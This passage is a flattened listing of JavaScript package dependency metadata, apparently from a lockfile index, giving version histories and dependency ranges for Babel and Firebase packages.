@babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.4 @babel/types@^7.19.4 debug@^4.1.0 globals@^11.1.0 7.19.6 @babel/code-frame@^7.18.6 @babel/generator@^7.19.6 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.19.6 @babel/types@^7.19.4 debug@^4.1.0 globals@^11.1.0 7.20.0 @babel/code-frame@^7.18.6 @babel/generator@^7.20.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.0 @babel/types@^7.20.0 debug@^4.1.0 globals@^11.1.0 7.20.1 @babel/code-frame@^7.18.6 @babel/generator@^7.20.1 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.1 @babel/types@^7.20.0 debug@^4.1.0 globals@^11.1.0 7.20.5 @babel/code-frame@^7.18.6 @babel/generator@^7.20.5 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.5 @babel/types@^7.20.5 debug@^4.1.0 globals@^11.1.0 7.20.7 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.8 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.10 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.12 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.7 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.20.13 @babel/code-frame@^7.18.6 @babel/generator@^7.20.7 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.19.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.20.13 @babel/types@^7.20.7 debug@^4.1.0 globals@^11.1.0 7.21.0 @babel/code-frame@^7.18.6 @babel/generator@^7.21.0 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.0 @babel/types@^7.21.0 debug@^4.1.0 globals@^11.1.0 7.21.2 @babel/code-frame@^7.18.6 @babel/generator@^7.21.1 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.2 @babel/types@^7.21.2 debug@^4.1.0 globals@^11.1.0 7.21.3 @babel/code-frame@^7.18.6 @babel/generator@^7.21.3 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.3 @babel/types@^7.21.3 debug@^4.1.0 globals@^11.1.0 7.21.4 @babel/code-frame@^7.21.4 @babel/generator@^7.21.4 @babel/helper-environment-visitor@^7.18.9 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.4 @babel/types@^7.21.4 debug@^4.1.0 globals@^11.1.0 7.21.5 @babel/code-frame@^7.21.4 @babel/generator@^7.21.5 @babel/helper-environment-visitor@^7.21.5 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.21.5 @babel/types@^7.21.5 debug@^4.1.0 globals@^11.1.0 7.22.0 @babel/code-frame@^7.21.4 @babel/generator@^7.22.0 @babel/helper-environment-visitor@^7.21.5 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.0 @babel/types@^7.22.0 debug@^4.1.0 globals@^11.1.0 7.22.1 @babel/code-frame@^7.21.4 @babel/generator@^7.22.0 @babel/helper-environment-visitor@^7.22.1 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.0 @babel/types@^7.22.0 debug@^4.1.0 globals@^11.1.0 7.22.4 @babel/code-frame@^7.21.4 @babel/generator@^7.22.3 @babel/helper-environment-visitor@^7.22.1 @babel/helper-function-name@^7.21.0 @babel/helper-hoist-variables@^7.18.6 @babel/helper-split-export-declaration@^7.18.6 @babel/parser@^7.22.4 @babel/types@^7.22.4 debug@^4.1.0 globals@^11.1.0 7.22.5 @babel/code-frame@^7.22.5 @babel/generator@^7.22.5 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.5 @babel/parser@^7.22.5 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.6 @babel/code-frame@^7.22.5 @babel/generator@^7.22.5 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.6 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.7 @babel/code-frame@^7.22.5 @babel/generator@^7.22.7 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.7 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.8 @babel/code-frame@^7.22.5 @babel/generator@^7.22.7 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.7 @babel/types@^7.22.5 debug@^4.1.0 globals@^11.1.0 7.22.10 @babel/code-frame@^7.22.10 @babel/generator@^7.22.10 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.10 @babel/types@^7.22.10 debug@^4.1.0 globals@^11.1.0 7.22.11 @babel/code-frame@^7.22.10 @babel/generator@^7.22.10 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.11 @babel/types@^7.22.11 debug@^4.1.0 globals@^11.1.0 7.22.15 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.15 @babel/types@^7.22.15 debug@^4.1.0 globals@^11.1.0 7.22.17 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.17 debug@^4.1.0 globals@^11.1.0 7.22.18 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.18 debug@^4.1.0 globals@^11.1.0 7.22.19 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.5 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.19 debug@^4.1.0 globals@^11.1.0 7.22.20 @babel/code-frame@^7.22.13 @babel/generator@^7.22.15 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.22.5 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.22.16 @babel/types@^7.22.19 debug@^4.1.0 globals@^11.1.0 7.23.0 @babel/code-frame@^7.22.13 @babel/generator@^7.23.0 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.0 @babel/types@^7.23.0 debug@^4.1.0 globals@^11.1.0 7.23.2 @babel/code-frame@^7.22.13 @babel/generator@^7.23.0 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.0 @babel/types@^7.23.0 debug@^4.1.0 globals@^11.1.0 7.23.3 @babel/code-frame@^7.22.13 @babel/generator@^7.23.3 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.3 @babel/types@^7.23.3 debug@^4.1.0 globals@^11.1.0 7.23.4 @babel/code-frame@^7.23.4 @babel/generator@^7.23.4 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.4 @babel/types@^7.23.4 debug@^4.1.0 globals@^11.1.0 7.23.5 @babel/code-frame@^7.23.5 @babel/generator@^7.23.5 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.5 @babel/types@^7.23.5 debug@^4.1.0 globals@^11.1.0 7.23.6 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.6 @babel/types@^7.23.6 debug@^4.3.1 globals@^11.1.0 7.23.7 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.6 @babel/types@^7.23.6 debug@^4.3.1 globals@^11.1.0 7.23.9 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.23.9 @babel/types@^7.23.9 debug@^4.3.1 globals@^11.1.0 7.24.0 @babel/code-frame@^7.23.5 @babel/generator@^7.23.6 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.24.0 @babel/types@^7.24.0 debug@^4.3.1 globals@^11.1.0 7.24.1 @babel/code-frame@^7.24.1 @babel/generator@^7.24.1 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.22.6 @babel/parser@^7.24.1 @babel/types@^7.24.0 debug@^4.3.1 globals@^11.1.0 7.24.5 @babel/code-frame@^7.24.2 @babel/generator@^7.24.5 @babel/helper-environment-visitor@^7.22.20 @babel/helper-function-name@^7.23.0 @babel/helper-hoist-variables@^7.22.5 @babel/helper-split-export-declaration@^7.24.5 @babel/parser@^7.24.5 @babel/types@^7.24.5 debug@^4.3.1 globals@^11.1.0 7.24.6 @babel/code-frame@^7.24.6 @babel/generator@^7.24.6 @babel/helper-environment-visitor@^7.24.6 @babel/helper-function-name@^7.24.6 @babel/helper-hoist-variables@^7.24.6 @babel/helper-split-export-declaration@^7.24.6 @babel/parser@^7.24.6 @babel/types@^7.24.6 debug@^4.3.1 globals@^11.1.0 7.24.7 @babel/code-frame@^7.24.7 @babel/generator@^7.24.7 @babel/helper-environment-visitor@^7.24.7 @babel/helper-function-name@^7.24.7 @babel/helper-hoist-variables@^7.24.7 @babel/helper-split-export-declaration@^7.24.7 @babel/parser@^7.24.7 @babel/types@^7.24.7 debug@^4.3.1 globals@^11.1.0 7.24.8 @babel/code-frame@^7.24.7 @babel/generator@^7.24.8 @babel/helper-environment-visitor@^7.24.7 @babel/helper-function-name@^7.24.7 @babel/helper-hoist-variables@^7.24.7 @babel/helper-split-export-declaration@^7.24.7 @babel/parser@^7.24.8 @babel/types@^7.24.8 debug@^4.3.1 globals@^11.1.0 7.25.0 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 debug@^4.3.1 globals@^11.1.0 7.25.1 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.0 debug@^4.3.1 globals@^11.1.0 7.25.2 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.0 @babel/template@^7.25.0 @babel/types@^7.25.2 debug@^4.3.1 globals@^11.1.0 7.25.3 @babel/code-frame@^7.24.7 @babel/generator@^7.25.0 @babel/parser@^7.25.3 @babel/template@^7.25.0 @babel/types@^7.25.2 debug@^4.3.1 globals@^11.1.0 7.25.4 @babel/code-frame@^7.24.7 @babel/generator@^7.25.4 @babel/parser@^7.25.4 @babel/template@^7.25.0 @babel/types@^7.25.4 debug@^4.3.1 globals@^11.1.0 7.25.6 @babel/code-frame@^7.24.7 @babel/generator@^7.25.6 @babel/parser@^7.25.6 @babel/template@^7.25.0 @babel/types@^7.25.6 debug@^4.3.1 globals@^11.1.0 7.25.7 @babel/code-frame@^7.25.7 @babel/generator@^7.25.7 @babel/parser@^7.25.7 @babel/template@^7.25.7 @babel/types@^7.25.7 debug@^4.3.1 globals@^11.1.0 7.25.9 @babel/code-frame@^7.25.9 @babel/generator@^7.25.9 @babel/parser@^7.25.9 @babel/template@^7.25.9 @babel/types@^7.25.9 debug@^4.3.1 globals@^11.1.0 7.26.3 @babel/code-frame@^7.26.2 @babel/generator@^7.26.3 @babel/parser@^7.26.3 @babel/template@^7.25.9 @babel/types@^7.26.3 debug@^4.3.1 globals@^11.1.0 7.26.4 @babel/code-frame@^7.26.2 @babel/generator@^7.26.3 @babel/parser@^7.26.3 @babel/template@^7.25.9 @babel/types@^7.26.3 debug@^4.3.1 globals@^11.1.0 7.26.5 @babel/code-frame@^7.26.2 @babel/generator@^7.26.5 @babel/parser@^7.26.5 @babel/template@^7.25.9 @babel/types@^7.26.5 debug@^4.3.1 globals@^11.1.0 7.26.7 @babel/code-frame@^7.26.2 @babel/generator@^7.26.5 @babel/parser@^7.26.7 @babel/template@^7.25.9 @babel/types@^7.26.7 debug@^4.3.1 globals@^11.1.0 7.26.8 @babel/code-frame@^7.26.2 @babel/generator@^7.26.8 @babel/parser@^7.26.8 @babel/template@^7.26.8 @babel/types@^7.26.8 debug@^4.3.1 globals@^11.1.0 7.26.9 @babel/code-frame@^7.26.2 @babel/generator@^7.26.9 @babel/parser@^7.26.9 @babel/template@^7.26.9 @babel/types@^7.26.9 debug@^4.3.1 globals@^11.1.0 7.26.10 @babel/code-frame@^7.26.2 @babel/generator@^7.26.10 @babel/parser@^7.26.10 @babel/template@^7.26.9 @babel/types@^7.26.10 debug@^4.3.1 globals@^11.1.0 7.27.0 @babel/code-frame@^7.26.2 @babel/generator@^7.27.0 @babel/parser@^7.27.0 @babel/template@^7.27.0 @babel/types@^7.27.0 debug@^4.3.1 globals@^11.1.0 7.27.1 @babel/code-frame@^7.27.1 @babel/generator@^7.27.1 @babel/parser@^7.27.1 @babel/template@^7.27.1 @babel/types@^7.27.1 debug@^4.3.1 globals@^11.1.0 7.27.3 @babel/code-frame@^7.27.1 @babel/generator@^7.27.3 @babel/parser@^7.27.3 @babel/template@^7.27.2 @babel/types@^7.27.3 debug@^4.3.1 globals@^11.1.0 7.27.4 @babel/code-frame@^7.27.1 @babel/generator@^7.27.3 @babel/parser@^7.27.4 @babel/template@^7.27.2 @babel/types@^7.27.3 debug@^4.3.1 globals@^11.1.0 7.27.7 @babel/code-frame@^7.27.1 @babel/generator@^7.27.5 @babel/parser@^7.27.7 @babel/template@^7.27.2 @babel/types@^7.27.7 debug@^4.3.1 globals@^11.1.0 7.28.0 @babel/code-frame@^7.27.1 @babel/generator@^7.28.0 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.0 @babel/template@^7.27.2 @babel/types@^7.28.0 debug@^4.3.1 7.28.3 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.3 @babel/template@^7.27.2 @babel/types@^7.28.2 debug@^4.3.1 7.28.4 @babel/code-frame@^7.27.1 @babel/generator@^7.28.3 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.4 @babel/template@^7.27.2 @babel/types@^7.28.4 debug@^4.3.1 7.28.5 @babel/code-frame@^7.27.1 @babel/generator@^7.28.5 @babel/helper-globals@^7.28.0 @babel/parser@^7.28.5 @babel/template@^7.27.2 @babel/types@^7.28.5 debug@^4.3.1 @babel/types 7.1.2 esutils@^2.0.2 lodash@^4.17.10 to-fast-properties@^2.0.0 7.6.1 esutils@^2.0.2 lodash@^4.17.13 to-fast-properties@^2.0.0 7.28.5 @babel/helper-string-parser@^7.27.1 @babel/helper-validator-identifier@^7.28.5 @firebase/ai 1.4.1 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.3.3 Scope peer|@firebase/app-types@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics 0.6.18 @firebase/analytics-types@0.6.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/installations@0.4.32 @firebase/logger@0.2.6 @firebase/util@1.3.0 tslib@^2.1.0 0.10.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/installations@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.10.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/installations@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.10.17 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/installations@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics-compat 0.2.6 @firebase/analytics@0.10.0 @firebase/analytics-types@0.8.0 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/util@1.9.3 tslib@^2.1.0 0.2.14 @firebase/analytics@0.10.8 @firebase/analytics-types@0.8.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 0.2.23 @firebase/analytics@0.10.17 @firebase/analytics-types@0.8.3 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/analytics-types 0.6.0 0.8.0 0.8.2 0.8.3 @firebase/app 0.6.30 @firebase/app-types@0.6.3 @firebase/component@0.5.6 @firebase/logger@0.2.6 @firebase/util@1.3.0 dom-storage@2.1.0 tslib@^2.1.0 xmlhttprequest@1.8.0 0.9.13 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 idb@7.1.1 tslib@^2.1.0 0.10.13 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 idb@7.1.1 tslib@^2.1.0 0.13.2 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 idb@7.1.1 tslib@^2.1.0 @firebase/app-check 0.3.2 Scope peer|@firebase/app@0.x @firebase/app-check-interop-types@0.1.0 @firebase/app-check-types@0.3.1 Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/logger@0.2.6 @firebase/util@1.3.0 tslib@^2.1.0 0.8.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.8.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.10.1 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-check-compat 0.3.7 @firebase/app-check@0.8.0 @firebase/app-check-types@0.5.0 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.3.15 @firebase/app-check@0.8.8 @firebase/app-check-types@0.5.2 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.26 @firebase/app-check@0.10.1 @firebase/app-check-types@0.5.3 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-check-interop-types 0.1.0 0.3.0 0.3.2 0.3.3 @firebase/app-check-types 0.3.1 0.5.0 0.5.2 0.5.3 @firebase/app-compat 0.2.13 @firebase/app@0.9.13 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 0.2.43 @firebase/app@0.10.13 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.4.2 @firebase/app@0.13.2 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/app-types 0.6.3 0.9.0 0.9.2 0.9.3 @firebase/auth 0.16.8 Scope peer|@firebase/app@0.x @firebase/auth-types@0.10.3 0.23.2 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 1.7.9 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 Scope peer|@react-native-async-storage/async-storage@^1.18.1 tslib@^2.1.0 undici@6.19.7 1.10.8 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 Scope peer|@react-native-async-storage/async-storage@^1.18.1 tslib@^2.1.0 @firebase/auth-compat 0.4.2 Scope peer|@firebase/app-compat@0.x @firebase/auth@0.23.2 @firebase/auth-types@0.12.0 @firebase/component@0.6.4 @firebase/util@1.9.3 node-fetch@2.6.7 tslib@^2.1.0 0.5.14 Scope peer|@firebase/app-compat@0.x @firebase/auth@1.7.9 @firebase/auth-types@0.12.2 @firebase/component@0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 undici@6.19.7 0.5.28 Scope peer|@firebase/app-compat@0.x @firebase/auth@1.10.8 @firebase/auth-types@0.13.0 @firebase/component@0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/auth-interop-types 0.1.6 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.2.1 0.2.3 0.2.4 @firebase/auth-types 0.10.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.12.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.12.2 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 0.13.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/component 0.5.6 @firebase/util@1.3.0 tslib@^2.1.0 0.6.4 @firebase/util@1.9.3 tslib@^2.1.0 0.6.9 @firebase/util@1.10.0 tslib@^2.1.0 0.6.18 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/data-connect 0.1.0 Scope peer|@firebase/app@0.x @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.10 Scope peer|@firebase/app@0.x @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/database 0.11.0 @firebase/auth-interop-types@0.1.6 @firebase/component@0.5.6 @firebase/database-types@0.8.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 faye-websocket@0.11.3 tslib@^2.1.0 0.14.4 @firebase/auth-interop-types@0.2.1 @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 faye-websocket@0.11.4 tslib@^2.1.0 1.0.8 @firebase/app-check-interop-types@0.3.2 @firebase/auth-interop-types@0.2.3 @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 faye-websocket@0.11.4 tslib@^2.1.0 1.0.20 @firebase/app-check-interop-types@0.3.3 @firebase/auth-interop-types@0.2.4 @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 faye-websocket@0.11.4 tslib@^2.1.0 @firebase/database-compat 0.3.4 @firebase/component@0.6.4 @firebase/database@0.14.4 @firebase/database-types@0.10.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 tslib@^2.1.0 1.0.8 @firebase/component@0.6.9 @firebase/database@1.0.8 @firebase/database-types@1.0.5 @firebase/logger@0.4.2 @firebase/util@1.10.0 tslib@^2.1.0 2.0.11 @firebase/component@0.6.18 @firebase/database@1.0.20 @firebase/database-types@1.0.15 @firebase/logger@0.4.4 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/database-types 0.8.0 @firebase/app-types@0.6.3 @firebase/util@1.3.0 0.10.4 @firebase/app-types@0.9.0 @firebase/util@1.9.3 1.0.5 @firebase/app-types@0.9.2 @firebase/util@1.10.0 1.0.15 @firebase/app-types@0.9.3 @firebase/util@1.12.1 @firebase/firestore 2.4.0 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/firestore-types@2.4.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 @firebase/webchannel-wrapper@0.5.1 @grpc/grpc-js@^1.3.2 @grpc/proto-loader@^0.6.0 node-fetch@2.6.1 tslib@^2.1.0 2.4.1 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/firestore-types@2.4.0 @firebase/logger@0.2.6 @firebase/util@1.3.0 @firebase/webchannel-wrapper@0.5.1 @grpc/grpc-js@^1.3.2 @grpc/proto-loader@^0.6.0 node-fetch@2.6.7 tslib@^2.1.0 3.13.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.4 @firebase/logger@0.4.0 @firebase/util@1.9.3 @firebase/webchannel-wrapper@0.10.1 @grpc/grpc-js@~1.7.0 @grpc/proto-loader@^0.6.13 node-fetch@2.6.7 tslib@^2.1.0 4.7.3 Scope peer|@firebase/app@0.x @firebase/component@0.6.9 @firebase/logger@0.4.2 @firebase/util@1.10.0 @firebase/webchannel-wrapper@1.0.1 @grpc/grpc-js@~1.9.0 @grpc/proto-loader@^0.7.8 tslib@^2.1.0 undici@6.19.7 4.8.0 Scope peer|@firebase/app@0.x @firebase/component@0.6.18 @firebase/logger@0.4.4 @firebase/util@1.12.1 @firebase/webchannel-wrapper@1.0.3 @grpc/grpc-js@~1.9.0 @grpc/proto-loader@^0.7.8 tslib@^2.1.0 @firebase/firestore-compat 0.3.12 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.4 @firebase/firestore@3.13.0 @firebase/firestore-types@2.5.1 @firebase/util@1.9.3 tslib@^2.1.0 0.3.38 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.9 @firebase/firestore@4.7.3 @firebase/firestore-types@3.0.2 @firebase/util@1.10.0 tslib@^2.1.0 0.3.53 Scope peer|@firebase/app-compat@0.x @firebase/component@0.6.18 @firebase/firestore@4.8.0 @firebase/firestore-types@3.0.3 @firebase/util@1.12.1 tslib@^2.1.0 @firebase/firestore-types 2.4.0 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 2.5.1 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 3.0.2 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x 3.0.3 Scope peer|@firebase/app-types@0.x Scope peer|@firebase/util@1.x @firebase/functions 0.6.15 Scope peer|@firebase/app@0.x Scope peer|@firebase/app-types@0.x @firebase/component@0.5.6 @firebase/functions-types@0.4.0 